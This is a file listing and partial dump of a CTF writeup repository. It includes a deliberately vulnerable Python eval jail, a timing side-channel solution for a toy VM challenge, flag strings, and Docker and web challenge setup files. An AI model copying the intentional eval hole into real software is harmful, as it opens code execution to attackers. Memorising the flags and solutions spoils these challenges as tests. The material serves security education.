├── .gitignore ├── README.md ├── angstromctf23 └── misc │ └── obligatory │ └── writeup │ ├── README.md │ └── src │ ├── Dockerfile │ ├── flag.txt │ └── jail.py ├── b01lers22 ├── README.md ├── pwn │ └── veryfastvm │ │ ├── README.md │ │ ├── cpu.orig.py │ │ ├── cpu.py │ │ ├── flag.txt │ │ ├── pseudo-code.c │ │ ├── solution.asm │ │ ├── solution.min.asm │ │ └── solution.too-many.asm └── web │ └── hackerplace │ ├── README.md │ ├── hackerplace-src │ ├── Dockerfile_bot │ ├── Dockerfile_web │ ├── app.js │ ├── bot.js │ ├── canvas │ │ └── canvas │ ├── docker-compose.yml │ ├── flag.txt │ ├── package.json │ ├── pixel.png │ ├── static │ │ ├── css │ │ │ └── style.css │ │ └── js │ │ │ └── index.js │ └── templates │ │ └── index.ejs │ └── writeup-resources │ ├── callback-success.png │ ├── index.png │ ├── jwt.png │ ├── to-server-mal.png │ └── to-server-reg.png ├── csaw22-finals └── misc │ ├── embryo-leak │ ├── README.md │ ├── resources │ │ ├── help.png │ │ └── less.png │ ├── src-private │ │ ├── flag │ │ └── service.py │ └── src-public │ │ └── service.py │ └── super-guesser-game │ ├── README.md │ ├── resources │ └── run.png │ ├── service.py │ └── src │ ├── flag.txt │ └── service.py ├── csaw22-quals └── pwn │ └── how2pwn │ ├── README.md │ ├── challenge1 │ ├── README.md │ └── solution1.py │ ├── challenge2 │ ├── README.md │ └── solution2.py │ ├── challenge3 │ ├── README.md │ └── solution3.py │ ├── challenge4 │ ├── Makefile │ ├── README.md │ ├── myebpf-thin.c │ ├── myebpf.c │ └── solution4.py │ ├── public │ ├── Dockerfile │ ├── README.md │ ├── bin │ │ ├── all │ │ │ ├── chal1 │ │ │ ├── chal2 │ │ │ ├── chal3 │ │ │ └── chal4 │ │ ├── chal │ │ ├── exp.py │ │ ├── flag │ │ ├── logo │ │ └── start.sh │ ├── ctf.xinetd │ ├── docker-compose.yml │ ├── src │ │ ├── chal1.c │ │ ├── chal2.c │ │ ├── chal3.c │ │ └── chal4.c │ └── start.sh │ └── writeup-resources │ ├── chal2-after.png │ ├── chal2-after2.png │ ├── chal2-before.png │ ├── chal2-before2.png │ └── chal2-ss-call-rdx.png ├── diceCTF23 ├── misc │ └── mlog │ │ ├── README.md │ │ ├── resources │ │ ├── chatgpt-output.png │ │ ├── chatgpt-prompt.png │ │ ├── flag.png │ │ ├── playground-flag.png │ │ ├── prompt.png │ │ └── sample-input.png │ │ └── src │ │ └── mlog.tar.gz ├── pwn │ └── dice-visor │ │ ├── README.md │ │ ├── solution │ │ ├── build.sh │ │ ├── gen-shellcode.py │ │ ├── ghidra-kvm.h │ │ ├── init │ │ ├── initramfs_patched.cpio.gz │ │ └── main.c │ │ └── src │ │ ├── bzImage │ │ ├── dicer-visor │ │ └── initramfs.cpio.gz └── rev │ ├── not-baby-parallelism │ ├── README.md │ ├── solution.py │ └── src │ │ ├── flag.out │ │ └── pppp │ ├── parallelism │ ├── README.md │ ├── resources │ │ ├── gdb.png │ │ ├── memcmp.png │ │ ├── ready-to-attach.png │ │ └── run.png │ └── src │ │ └── parallelism │ └── time-travel │ ├── README.md │ ├── solution.py │ └── src │ ├── input.bin │ └── time_travel ├── googleCTF22 ├── misc │ ├── Segfault-Labyrinth │ │ ├── README.md │ │ ├── resources │ │ │ └── 52dfc0e5d7ec9438e47b7ca7e721b87bb14a86d55e2970fdec94cd4ddac4d6fbd129f16780feaf6dc756b79319712cc980a60e52749b4b691bc9f9769831d697.zip │ │ └── src │ │ │ ├── challenge │ │ │ ├── flag.txt │ │ │ ├── gdbscript │ │ │ ├── main.c │ │ │ ├── seg-faulting-labs.h │ │ │ ├── shellcode.c │ │ │ ├── solution.py │ │ │ └── test │ │ │ ├── Makefile │ │ │ └── test.c │ └── appnote │ │ ├── README.md │ │ ├── resources │ │ ├── 2551253642bde3066e55c9cc8e9b0b4aa77feadc00c81032da778e6f7c89907135dfc2611fd8617204720dbfadb31429ae11f6ecd202887f4ce99f2f53a3c5e8.zip │ │ ├── detailed-offsets.png │ │ └── overview.png │ │ └── src │ │ ├── dump.zip │ │ └── solution.py └── sandbox │ └── treebox │ ├── README.md │ ├── resources │ └── 17f98f8c9c9f8089ab3a35e94de752582253c3784637fe6ef6a561c12b817fcd7acf05a4573bff2cd43247f8e5263200aa29745605ae2719de774160bb21e301.zip │ └── src │ ├── .python-version │ ├── Dockerfile │ ├── flag │ └── treebox.py ├── hack-a-sat-23 └── pwn │ ├── RISC-V-Smash-Baby │ ├── README.md │ ├── resources │ │ ├── gdb-multiarch.png │ │ ├── pwntools-gdb.png │ │ ├── riscv-datatypes.png │ │ └── riscv-registers.png │ └── src │ │ ├── minimal-template.py │ │ ├── qemu-riscv │ │ ├── qemu-riscv-static │ │ ├── smash-baby │ │ └── solution.py │ └── dROP-Baby │ ├── README.md │ └── src │ ├── drop-baby │ ├── gadgets-func-calls.log │ ├── gadgets.log │ ├── hidden │ └── server.ini │ ├── qemu-riscv │ ├── qemu-riscv-static │ ├── server.ini │ ├── solution-cheesy.py │ └── solution.py ├── insomnihack2022 ├── PimpMyVariant │ ├── README.md │ └── resources │ │ └── home.png └── herald │ ├── Herald-e3081153dbcbc3f2bcd6aa0453e8ec6f7055deaf5762aee0a794e28e58b8bb12.apk │ ├── README.md │ └── resources │ ├── app-flag.png │ └── app-running.png ├── insomnihack2024 └── CryptoNotes │ ├── README.md │ ├── resources │ └── app-a91690d6479014d533bea108755aba2424b45b4b416823ed0c821ae421f820eb.apk │ └── solution │ ├── MaliciousApp │ ├── .gitignore │ ├── CMakeLists.txt │ ├── app │ │ ├── .gitignore │ │ ├── build.gradle │ │ ├── proguard-rules.pro │ │ └── src │ │ │ └── main │ │ │ ├── AndroidManifest.xml │ │ │ ├── cpp │ │ │ ├── main.cpp │ │ │ └── mylogger.h │ │ │ ├── java │ │ │ └── com │ │ │ │ ├── example │ │ │ │ └── insomnipwn │ │ │ │ │ └── MainActivity.kt │ │ │ │ └── inso │ │ │ │ └── ins24 │ │ │ │ └── utils │ │ │ │ ├── CryptoConfig.java │ │ │ │ └── JSONBuilder.java │ │ │ └── res │ │ │ ├── drawable-v24 │ │ │ └── ic_launcher_foreground.xml │ │ │ ├── drawable │ │ │ └── ic_launcher_background.xml │ │ │ ├── layout │ │ │ └── activity_main.xml │ │ │ ├── mipmap-anydpi-v26 │ │ │ ├── ic_launcher.xml │ │ │ └── ic_launcher_round.xml │ │ │ ├── mipmap-hdpi │ │ │ ├── ic_launcher.webp │ │ │ └── ic_launcher_round.webp │ │ │ ├── mipmap-mdpi │ │ │ ├── ic_launcher.webp │ │ │ └── ic_launcher_round.webp │ │ │ ├── mipmap-xhdpi │ │ │ ├── ic_launcher.webp │ │ │ └── ic_launcher_round.webp │ │ │ ├── mipmap-xxhdpi │ │ │ ├── ic_launcher.webp │ │ │ └── ic_launcher_round.webp │ │ │ ├── mipmap-xxxhdpi │ │ │ ├── ic_launcher.webp │ │ │ └── ic_launcher_round.webp │ │ │ ├── values-night │ │ │ └── themes.xml │ │ │ ├── values │ │ │ ├── colors.xml │ │ │ ├── strings.xml │ │ │ └── themes.xml │ │ │ └── xml │ │ │ ├── backup_rules.xml │ │ │ └── data_extraction_rules.xml │ ├── build.gradle │ ├── gradle.properties │ ├── gradle │ │ └── wrapper │ │ │ ├── gradle-wrapper.jar │ │ │ └── gradle-wrapper.properties │ ├── gradlew │ ├── gradlew.bat │ └── settings.gradle │ ├── init.gdbscript │ └── main.js ├── justCTF22 └── pwn │ └── arm │ ├── Armv8-A-AArch64-Cheatsheet.png │ ├── README.md │ ├── arm32-bit-cheatsheetv1.3.png │ ├── cli │ ├── cli_minimal_aarch64 │ ├── Dockerfile │ ├── cli │ ├── flag.txt │ └── run.sh │ ├── cli_minimal_native │ ├── Dockerfile │ ├── cli │ ├── flag.txt │ └── run.sh │ ├── resources │ ├── cmd-prompt.png │ └── login-prompt.png │ └── solution.py ├── lakeCTF23 └── pwn │ └── trustMEE │ ├── README.md │ ├── resources │ ├── Dockerfile │ ├── exploit_template.py │ ├── flag.txt │ ├── grade_ca.c │ ├── grade_ca.h │ ├── grade_ta.so │ ├── opentee.conf │ └── run.sh │ └── solution │ ├── Dockerfile │ ├── Makefile │ ├── grade_ca.c │ ├── grade_ca.h │ ├── load_grade_ca.c │ ├── mmap-demo │ └── main.c │ ├── opentee-helper.h │ ├── reload-forcefully-ta.sh │ ├── run-client.sh │ ├── run-gdb.sh │ └── script.gdb ├── m0lecon22 ├── dumbforum │ ├── README.md │ ├── dumbforum-src │ │ ├── Dockerfile │ │ ├── app │ │ │ ├── __init__.py │ │ │ ├── errors.py │ │ │ ├── forms.py │ │ │ ├── models.py │ │ │ ├── routes.py │ │ │ ├── static │ │ │ │ └── style.css │ │ │ └── templates │ │ │ │ ├── 404.html │ │ │ │ ├── 409.html │ │ │ │ ├── 500.html │ │ │ │ ├── base.html │ │ │ │ ├── edit_profile.html │ │ │ │ ├── forums.html │ │ │ │ ├── index.html │ │ │ │ ├── login.html │ │ │ │ ├── post.html │ │ │ │ ├── profile.html │ │ │ │ └── register.html │ │ ├── config.py │ │ ├── db │ │ │ └── app.db │ │ ├── docker-compose.yml │ │ ├── main.py │ │ └── requirements.txt │ ├── jinja2-dumper.py │ ├── jinja2.TemplateReference.dump │ └── writeup-resources │ │ ├── detour-xss.png │ │ ├── flag.png │ │ ├── index.png │ │ ├── invalid-email.png │ │ └── register-malicious.png └── fancynotes │ ├── README.md │ ├── fancynotes-src │ ├── Dockerfile │ ├── app │ │ ├── __init__.py │ │ ├── db.py │ │ ├── models.py │ │ ├── routes.py │ │ ├── static │ │ │ └── chao.gif │ │ ├── templates │ │ │ ├── base.html │ │ │ ├── index.html │ │ │ ├── login.html │ │ │ ├── notes.html │ │ │ └── registration.html │ │ ├── utils.py │ │ └── validators.py │ ├── docker-compose.yml │ └── requirements.txt │ ├── solution.py │ └── writeup-resources │ ├── create-note.png │ ├── index.png │ ├── login.png │ └── notes.png ├── midnight-quals-23 ├── pwn │ └── scaas │ │ ├── README.md │ │ ├── resources │ │ ├── sample-run.png │ │ └── solution-txt.png │ │ ├── scaas.c │ │ ├── solution.py │ │ ├── solver.py │ │ └── src │ │ └── scaas └── rev │ └── oss │ ├── README.md │ ├── resources │ ├── xref-puts-O0.png │ └── xref-puts-O2.png │ ├── solution │ ├── Makefile │ ├── lift.py │ ├── oss.angr.c │ └── solution.py │ └── src │ └── oss.c ├── midnight-quals-24 └── pwn │ └── roborop │ ├── Makefile │ ├── README.md │ ├── brutter.sh │ ├── dummy.c │ ├── dummy.gdbscript │ ├── resources │ └── roborop.tar.gz │ └── solution.py ├── pwnable.tw └── 3x17 │ ├── 3x17 │ ├── 3x17-ghidra.gpr │ ├── 3x17-ghidra.rep │ ├── idata │ │ ├── 00 │ │ │ ├── 00000000.prp │ │ │ └── ~00000000.db │ │ │ │ └── db.13.gbf │ │ ├── ~index.bak │ │ └── ~index.dat │ ├── project.prp │ ├── projectState │ ├── user │ │ └── ~index.dat │ └── versioned │ │ ├── ~index.bak │ │ └── ~index.dat │ └── expoit.py ├── sekaictf24 └── hijacker │ ├── README.md │ ├── resources │ └── secure_app.apk │ └── solution │ ├── .gitignore │ ├── app │ ├── .gitignore │ ├── build.gradle.kts │ ├── proguard-rules.pro │ └── src │ │ └── main │ │ ├── AndroidManifest.xml │ │ ├── java │ │ └── zero │ │ │ └── tolerance │ │ │ └── sekaidemo │ │ │ ├── MainActivity.kt │ │ │ └── OverlayService.kt │ │ └── res │ │ ├── drawable │ │ ├── ic_launcher_background.xml │ │ └── ic_launcher_foreground.xml │ │ ├── layout │ │ ├── activity_login.xml │ │ ├── activity_main.xml │ │ └── overlay_view.xml │ │ ├── mipmap-anydpi │ │ ├── ic_launcher.xml │ │ └── ic_launcher_round.xml │ │ ├── mipmap-hdpi │ │ ├── ic_launcher.webp │ │ └── ic_launcher_round.webp │ │ ├── mipmap-mdpi │ │ ├── ic_launcher.webp │ │ └── ic_launcher_round.webp │ │ ├── mipmap-xhdpi │ │ ├── ic_launcher.webp │ │ └── ic_launcher_round.webp │ │ ├── mipmap-xxhdpi │ │ ├── ic_launcher.webp │ │ └── ic_launcher_round.webp │ │ ├── mipmap-xxxhdpi │ │ ├── ic_launcher.webp │ │ └── ic_launcher_round.webp │ │ ├── values-night │ │ └── themes.xml │ │ ├── values │ │ ├── colors.xml │ │ ├── strings.xml │ │ └── themes.xml │ │ └── xml │ │ ├── backup_rules.xml │ │ └── data_extraction_rules.xml │ ├── build.gradle.kts │ ├── gradle.properties │ ├── gradle │ ├── libs.versions.toml │ └── wrapper │ │ ├── gradle-wrapper.jar │ │ └── gradle-wrapper.properties │ ├── gradlew │ ├── gradlew.bat │ └── settings.gradle.kts ├── statistics.sh ├── trx25 ├── pwn │ └── virtual_insanity │ │ ├── README.md │ │ ├── resources │ │ └── dist.zip │ │ └── solution.py └── pyjail │ └── golf │ ├── README.md │ └── resources │ └── challenge-misc-golf.zip ├── uiuctf2020 ├── .gitignore ├── README.md ├── kernel-exploitation │ ├── Getting_Started.pdf │ ├── Syscalls.pdf │ ├── freaky-file-descriptors │ │ └── README.md │ ├── how-to-get-started │ │ └── writeup.md │ ├── kernel-memory-leak │ │ ├── README.md │ │ ├── dollar-not-working.png │ │ ├── exploit-proof.png │ │ ├── hello-world.png │ │ ├── kernel-panic.png │ │ ├── part1-too-much.png │ │ ├── part2.png │ │ ├── part3.png │ │ ├── rash-splash-screen.png │ │ └── workaround.png │ ├── kernel-time-to-start │ │ ├── README.md │ │ ├── correct-1-char.gif │ │ ├── correct-2-chars.gif │ │ ├── dual.gif │ │ ├── invalid-1-char.gif │ │ ├── login-screen.png │ │ └── login-success.png │ └── whats-a-syscall │ │ ├── README.md │ │ ├── code1.png │ │ ├── screen1.png │ │ ├── screen2.png │ │ └── success.png └── pwn │ └── accounting-accidents │ ├── README.md │ ├── solution │ ├── accounting │ ├── auxiliary.c │ ├── auxiliary.so │ ├── checksec.json │ ├── gdb-script.gdb │ ├── ghidra │ │ ├── accounting.gpr │ │ └── accounting.rep │ │ │ ├── idata │ │ │ ├── 00 │ │ │ │ ├── 00000000.prp │ │ │ │ └── ~00000000.db │ │ │ │ │ └── db.14.gbf │ │ │ ├── ~index.bak │ │ │ └── ~index.dat │ │ │ ├── project.prp │ │ │ ├── projectState │ │ │ ├── user │ │ │ └── ~index.dat │ │ │ └── versioned │ │ │ ├── ~index.bak │ │ │ └── ~index.dat │ ├── node.h │ └── solution.py │ ├── ss-output.png │ └── ss-solution.png ├── uiuctf22 ├── jail │ ├── a-horse-with-no-names │ │ ├── README.md │ │ ├── desert.modified.py │ │ ├── generator.py │ │ ├── resources │ │ │ ├── Dockerfile │ │ │ ├── desert.py │ │ │ └── success.png │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── desert.py │ │ │ └── flag.txt │ ├── a-horse-with-no-neighs │ │ ├── README.md │ │ ├── desert.modified.py │ │ ├── generator.py │ │ ├── resources │ │ │ └── mapping.png │ │ └── src │ │ │ ├── Dockerfile │ │ │ ├── desert.py │ │ │ └── flag.txt │ └── safepy │ │ ├── README.md │ │ ├── resources │ │ └── handout.tar.gz │ │ └── src │ │ ├── Dockerfile │ │ ├── flag │ │ ├── main.py │ │ ├── nsjail.cfg │ │ └── run.sh └── pwn │ ├── no-syscalls-allowed │ ├── README.md │ ├── flag.txt │ ├── no_syscalls_allowed │ ├── no_syscalls_allowed.modified.c │ ├── resources │ │ ├── r13.png │ │ └── vmm.png │ ├── solution.py │ └── src │ │ └── no_syscalls_allowed.c │ └── odd-shell │ ├── README.md │ ├── flag │ ├── resources │ ├── after.png │ ├── before.png │ └── registers.png │ ├── solution.py │ └── src │ ├── Dockerfile │ ├── chal │ └── nsjail.cfg ├── uiuctf23 ├── pwn │ ├── chainmail │ │ ├── README.md │ │ ├── resources │ │ │ ├── Dockerfile │ │ │ ├── chal │ │ │ ├── chal.c │ │ │ └── flag.txt │ │ └── solution.py │ ├── virophage │ │ ├── README.md │ │ ├── resources │ │ │ ├── flag.png │ │ │ └── handout.tar.gz │ │ └── solution │ │ │ ├── 32-bitheader │ │ │ ├── shellcode-generator.py │ │ │ └── solve.sh │ └── zapping-a-suid1 │ │ ├── README.md │ │ ├── resources │ │ └── handout.tar.gz │ │ └── solution │ │ ├── Makefile │ │ ├── exploit.c │ │ ├── shellcode-execve.S │ │ ├── shellcode-flag.S │ │ └── solve.sh └── pyjail │ └── rattler-read │ └── writeup │ ├── README.md │ ├── resources │ ├── handout.tar.gz │ ├── neat-trick.png │ ├── pop-a-shell.png │ ├── random-interactive.png │ ├── random-module.png │ ├── scoping.png │ └── solve.png │ └── solution.py └── umass22 ├── README.md ├── baby-vm ├── .gitignore ├── README.md ├── babyvm ├── gdbpy-script.py └── rwx-dump ├── umassdining ├── Dockerfile ├── README.md ├── run.sh └── src │ ├── bot │ └── bot.py │ ├── main.py │ ├── static │ ├── images │ │ ├── 1984.jpg │ │ └── howmuchyoushouldeatumassdining.jpg │ ├── js │ │ └── thing.js │ └── styles │ │ └── bootstrap.min.css │ └── templates │ ├── essay_checker.html │ ├── index.html │ └── register.html └── venting ├── README.md ├── solution.py └── writeup-resources ├── admin-page.png ├── index.png ├── inthevents.png └── requests.png /.gitignore: -------------------------------------------------------------------------------- 1 | .vscode/ 2 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CTF writeups 2 | 3 | A place where I post CTF writeups and solutions for challenges that I have solved. 4 | 5 | ## Repo statistics 6 | 7 | This repository contains the following number of writeups per category: 8 | 9 | | | | 10 | |----|----| 11 | | crypto | 1 | 12 | | hypervisor-pwn | 1 | 13 | | misc | 2 | 14 | | pwn | 18 | 15 | | pyjail | 9 | 16 | | rev | 6 | 17 | | Android | 2 | 18 | | web | 5 | 19 | -------------------------------------------------------------------------------- /angstromctf23/misc/obligatory/writeup/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM pwn.red/jail 2 | 3 | COPY --from=python:3.10-slim-bullseye / /srv 4 | COPY jail.py /srv/app/run 5 | COPY flag.txt /srv/app/flag.txt 6 | 7 | RUN mv /srv/app/flag.txt /srv/app/flag-$(head -c16 /dev/urandom | od -tx1 -An | tr -d ' ').txt 8 | RUN chmod 755 /srv/app/run 9 | 10 | ENV JAIL_MEM=20M 11 | -------------------------------------------------------------------------------- /angstromctf23/misc/obligatory/writeup/src/flag.txt: -------------------------------------------------------------------------------- 1 | actf{c0uln7_g3t_1t_7o_w0rk_0n_python39_s4dge} 2 | -------------------------------------------------------------------------------- /angstromctf23/misc/obligatory/writeup/src/jail.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python 2 | cod = input("sned cod: ") 3 | 4 | if any(x not in "q(jw=_alsynxodtg)feum'zk:hivbcpr" for x in cod): 5 | print("bad cod") 6 | else: 7 | try: 8 | print(eval(cod, {"__builtins__": {"__import__": __import__}})) 9 | except Exception as e: 10 | print("oop", e) 11 | -------------------------------------------------------------------------------- /b01lers22/README.md: -------------------------------------------------------------------------------- 1 | # b01lersCTF 2022 2 | 3 | > b01lers CTF is the public competitive CTF hosted by the Purdue Capture The Flag team. 4 | > 5 | > Registration will open approximately 2 weeks prior to the event. Join our discord at discord.gg/tBMqujE and stay posted for further info at https://ctf.b01lers.com 6 | > 7 | > Happy hacking! 8 | > 9 | > Prizes: Unfortunately, due to some administrative issues there are no explicit prizes for standings this year. 10 | > 11 | 12 | Our team [VUbar](https://ctftime.org/team/1353/) came 31th in place. 13 | 14 | Challenges are [publicly available](https://github.com/b01lers/b01lers-ctf-2022). 15 | -------------------------------------------------------------------------------- /b01lers22/pwn/veryfastvm/flag.txt: -------------------------------------------------------------------------------- 1 | bctf{c4ching_is_v3ry_goodo} -------------------------------------------------------------------------------- /b01lers22/pwn/veryfastvm/solution.asm: -------------------------------------------------------------------------------- 1 | 2 | # Solution with no comments to satisfy 2000 characters limitation 3 | movfrom r0 0000000 r1 4 | jmpz 21 5 | movc r1 4 6 | movc r6 32 7 | movc r8 1 8 | movc r9 2 9 | mov r2 r1 10 | mul r2 r6 11 | movfrom r3 1048575 r1 12 | movc r4 0x00000001 13 | mov r0 r4 14 | and r0 r3 15 | jmpz 2 16 | movfrom r0 0000000 r2 17 | mul r4 r9 18 | add r2 r8 19 | mov r0 r4 20 | jmpg r7 -7 21 | sub r1 r8 22 | mov r0 r1 23 | jmpg r7 -15 24 | 25 | reset 26 | 27 | movc r1 5 28 | movc r6 32 29 | movc r8 1 30 | movc r9 2 31 | mov r2 r1 32 | mul r2 r6 33 | sub r2 r8 34 | movc r3 0 35 | movc r4 32 36 | time 37 | mov r5 r0 38 | movfrom r0 0000000 r2 39 | time 40 | sub r0 r5 41 | sub r0 r8 42 | sub r0 r9 43 | xor r0 r8 44 | mul r3 r9 45 | or r3 r0 46 | sub r2 r8 47 | sub r4 r8 48 | mov r0 r4 49 | jmpg r7 -13 50 | movto r3 1000000 r1 51 | sub r1 r8 52 | mov r0 r1 53 | jmpg r8 -22 54 | movfrom r0 1000002 r7 55 | movfrom r1 1000003 r7 56 | movfrom r2 1000004 r7 57 | movfrom r3 1000005 r7 58 | magic 59 | 60 | 61 | 62 | -------------------------------------------------------------------------------- /b01lers22/web/hackerplace/hackerplace-src/Dockerfile_bot: -------------------------------------------------------------------------------- 1 | FROM node:alpine 2 | 3 | WORKDIR /app 4 | COPY package.json . 5 | RUN npm install 6 | COPY . . 7 | 8 | CMD ["node", "bot.js"] 9 | -------------------------------------------------------------------------------- /b01lers22/web/hackerplace/hackerplace-src/Dockerfile_web: -------------------------------------------------------------------------------- 1 | FROM node:alpine 2 | 3 | WORKDIR /app 4 | COPY package.json . 5 | RUN npm install 6 | COPY . . 7 | 8 | CMD ["node", "app.js"] 9 | -------------------------------------------------------------------------------- /b01lers22/web/hackerplace/hackerplace-src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | place: 3 | build: 4 | dockerfile: ./Dockerfile_web 5 | context: . 6 | ports: 7 | - "8000:3000" 8 | volumes: 9 | - ./canvas:/app/canvas 10 | bot: 11 | build: 12 | dockerfile: ./Dockerfile_bot 13 | context: . 14 | restart: always 15 | 16 | -------------------------------------------------------------------------------- /b01lers22/web/hackerplace/hackerplace-src/flag.txt: -------------------------------------------------------------------------------- 1 | bctf{pl4y_n1ce_w1th_th3_0ther_h4ck3rz_d34r} -------------------------------------------------------------------------------- /b01lers22/web/hackerplace/hackerplace-src/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "dependencies": { 3 | "axios": "^0.26.1", 4 | "cookie-parser": "^1.4.6", 5 | "ejs": "^3.1.7", 6 | "express": "^4.17.3", 7 | "express-ws": "^5.0.2", 8 | "jsonwebtoken": "^8.5.1", 9 | "pngjs": "^6.0.0", 10 | "ws": "^8.5.0" 11 | }, 12 | "name": "hackerplace", 13 | "version": "1.0.0", 14 | "main": "app.js", 15 | "scripts": { 16 | "test": "echo \"Error: no test specified\" && exit 1" 17 | }, 18 | "keywords": [], 19 | "author": "", 20 | "license": "ISC", 21 | "description": "" 22 | } 23 | -------------------------------------------------------------------------------- /b01lers22/web/hackerplace/hackerplace-src/pixel.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/b01lers22/web/hackerplace/hackerplace-src/pixel.png -------------------------------------------------------------------------------- /b01lers22/web/hackerplace/hackerplace-src/static/css/style.css: -------------------------------------------------------------------------------- 1 | html, body { 2 | min-height: 100%; 3 | height: 100%; 4 | margin: 0; 5 | } 6 | 7 | html { 8 | box-sizing: border-box; 9 | } 10 | 11 | body { 12 | background-color: #555; 13 | display: flex; 14 | justify-content: center; 15 | align-items: center; 16 | overflow: hidden; 17 | } 18 | 19 | *, *::before, *::after { 20 | box-sizing: inherit; 21 | } 22 | 23 | canvas { 24 | image-rendering: pixelated; 25 | } 26 | 27 | #palette { 28 | position: absolute; 29 | bottom: 16px; 30 | display: flex; 31 | padding: 16px; 32 | background-color: #ccc; 33 | } 34 | 35 | .color { 36 | width: 40px; 37 | height: 40px; 38 | border: 2px solid black; 39 | margin: 0 4px; 40 | cursor: pointer; 41 | } 42 | 43 | .color.selected { 44 | border: 2px solid green; 45 | } 46 | 47 | #cooldown { 48 | background-color: white; 49 | padding: 12px; 50 | color: black; 51 | position: fixed; 52 | top: 20px; 53 | width: fit-content; 54 | margin: 0 auto; 55 | } 56 | -------------------------------------------------------------------------------- /b01lers22/web/hackerplace/hackerplace-src/templates/index.ejs: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | hacker/place 8 | 9 | 10 | 11 | 12 |
13 | <% for (let i = 0; i < palette.length; i++) { %> 14 | 15 | <% } %> 16 |
17 | 18 | 19 | 20 | 21 | -------------------------------------------------------------------------------- /b01lers22/web/hackerplace/writeup-resources/callback-success.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/b01lers22/web/hackerplace/writeup-resources/callback-success.png -------------------------------------------------------------------------------- /b01lers22/web/hackerplace/writeup-resources/index.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/b01lers22/web/hackerplace/writeup-resources/index.png -------------------------------------------------------------------------------- /b01lers22/web/hackerplace/writeup-resources/jwt.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/b01lers22/web/hackerplace/writeup-resources/jwt.png -------------------------------------------------------------------------------- /b01lers22/web/hackerplace/writeup-resources/to-server-mal.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/b01lers22/web/hackerplace/writeup-resources/to-server-mal.png -------------------------------------------------------------------------------- /b01lers22/web/hackerplace/writeup-resources/to-server-reg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/b01lers22/web/hackerplace/writeup-resources/to-server-reg.png -------------------------------------------------------------------------------- /csaw22-finals/misc/embryo-leak/resources/help.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/csaw22-finals/misc/embryo-leak/resources/help.png -------------------------------------------------------------------------------- /csaw22-finals/misc/embryo-leak/resources/less.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/csaw22-finals/misc/embryo-leak/resources/less.png -------------------------------------------------------------------------------- /csaw22-finals/misc/embryo-leak/src-private/flag: -------------------------------------------------------------------------------- 1 | flag{y0U_f1NiSHeD_EmpR3Yo_lAeK_Ch@L1EnGe_aNd_uSE_hE1p_T0_Le@k_ThE_vAr_272763f8} -------------------------------------------------------------------------------- /csaw22-finals/misc/super-guesser-game/resources/run.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/csaw22-finals/misc/super-guesser-game/resources/run.png -------------------------------------------------------------------------------- /csaw22-finals/misc/super-guesser-game/src/flag.txt: -------------------------------------------------------------------------------- 1 | flag{c0ool_y0u_ArE_aN_SuPer_GuE33eR_M@n!} 2 | -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/challenge4/Makefile: -------------------------------------------------------------------------------- 1 | 2 | 3 | all: myebpf myebpf-thin 4 | 5 | myebpf: myebpf.c 6 | gcc -g -O0 myebpf.c -o myebpf 7 | 8 | myebpf-thin: myebpf-thin.c 9 | gcc -g -O0 myebpf-thin.c -o myebpf-thin 10 | 11 | clean: 12 | rm -rf myebpf myebpf-thin *.o 13 | -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/public/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:22.04 as ctf 2 | 3 | RUN apt-get update && \ 4 | apt-get install -y lib32z1 xinetd 5 | 6 | RUN useradd -m ctf 7 | 8 | WORKDIR /home/ctf 9 | 10 | RUN cp -R /lib* /home/ctf && \ 11 | mkdir /home/ctf/usr && \ 12 | cp -R /usr/lib* /home/ctf/usr 13 | 14 | 15 | RUN mkdir /home/ctf/dev && \ 16 | mknod /home/ctf/dev/null c 1 3 && \ 17 | mknod /home/ctf/dev/zero c 1 5 && \ 18 | mknod /home/ctf/dev/random c 1 8 && \ 19 | mknod /home/ctf/dev/urandom c 1 9 && \ 20 | chmod 666 /home/ctf/dev/* 21 | 22 | RUN mkdir /home/ctf/bin && \ 23 | cp /bin/sh /home/ctf/bin && \ 24 | cp /bin/ls /home/ctf/bin && \ 25 | cp /bin/cat /home/ctf/bin && \ 26 | cp /usr/bin/timeout /home/ctf/bin 27 | 28 | COPY ./start.sh /start.sh 29 | RUN echo "Blocked by ctf_xinetd" > /etc/banner_fail 30 | 31 | RUN chmod +x /start.sh 32 | 33 | 34 | CMD ["/start.sh"] 35 | 36 | EXPOSE 9999 37 | -------------------------------------------------------------------------------- /csaw22-quals/pwn/how2pwn/public/README.md: -------------------------------------------------------------------------------- 1 | # Setup 2 | 3 | How to run the challenge locally: 4 | - `docker compose build` 5 | - `docker compose up` 6 | 7 | How to interact the challenge locally: 8 | - `docker ps -a` to show all running containers 9 | - `docker exec -it public-ctf-1 bash` to interact with the container shell 10 | 11 | 12 | # Your Tasks 13 | 14 | I would provide the skeleton code for the exploiting script. 15 | 16 | 